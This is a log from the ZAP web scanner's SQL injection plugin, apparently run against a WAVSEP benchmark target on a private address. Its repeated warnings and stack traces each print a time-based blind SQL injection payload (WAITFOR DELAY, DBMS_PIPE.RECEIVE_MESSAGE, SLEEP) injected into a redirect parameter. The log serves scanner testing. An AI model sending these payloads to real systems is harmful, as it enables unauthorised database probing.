http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%';WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680714 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(77)||CHR(100)||CHR(74),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(77)||CHR(100)||CHR(74),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680714 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680715 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(84)||CHR(70)||CHR(83)||CHR(108),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(84)||CHR(70)||CHR(83)||CHR(108),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680716 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(112)||CHR(97)||CHR(113)||CHR(121),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(112)||CHR(97)||CHR(113)||CHR(121),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680716 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) AND (SELECT * FROM (SELECT(SLEEP(5)))GSAp) AND (4549=4549] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND (SELECT * FROM (SELECT(SLEEP(5)))GSAp) AND (4549=4549 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680717 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(97)||CHR(105)||CHR(72)||CHR(76),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(97)||CHR(105)||CHR(72)||CHR(76),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680718 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini AND (SELECT * FROM (SELECT(SLEEP(5)))zGAN)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND (SELECT * FROM (SELECT(SLEEP(5)))zGAN) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680719 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(66)||CHR(69)||CHR(84),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(66)||CHR(69)||CHR(84),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680719 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') AND (SELECT * FROM (SELECT(SLEEP(5)))IeJx) AND ('yqDh'='yqDh] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND (SELECT * FROM (SELECT(SLEEP(5)))IeJx) AND ('yqDh'='yqDh at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680720 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' AND (SELECT * FROM (SELECT(SLEEP(5)))lwBl) AND 'CEoJ'='CEoJ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND (SELECT * FROM (SELECT(SLEEP(5)))lwBl) AND 'CEoJ'='CEoJ at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680720 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(111)||CHR(97)||CHR(76)||CHR(113),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(111)||CHR(97)||CHR(76)||CHR(113),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680722 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' AND (SELECT * FROM (SELECT(SLEEP(5)))LjHO) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND (SELECT * FROM (SELECT(SLEEP(5)))LjHO) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680722 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(79)||CHR(68)||CHR(84)||CHR(101),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(79)||CHR(68)||CHR(84)||CHR(101),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown 